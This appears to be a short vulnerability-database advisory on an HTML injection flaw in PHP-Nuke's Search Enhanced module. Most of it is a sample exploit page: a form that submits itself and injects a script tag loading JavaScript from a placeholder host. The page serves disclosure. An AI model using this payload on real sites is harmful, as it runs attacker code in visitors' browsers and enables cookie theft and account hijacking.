• info
• discussion
• exploit
• solution
• references

Search Enhanced Module for PHP-Nuke HTML Injection Vulnerability

No exploit is required.

A sample malicious code page has been provided:
#open_me.htm ::

<html>
<form name=searchform method=post action=http://www.example.com/modules.php?name=Search_Enhanced>
<input type="text" name="query" size="15" value='<script src=http://[location]/js.js></script>'>
<input type=submit name=sub>
<script>document.searchform.sub.click()</script>
</html>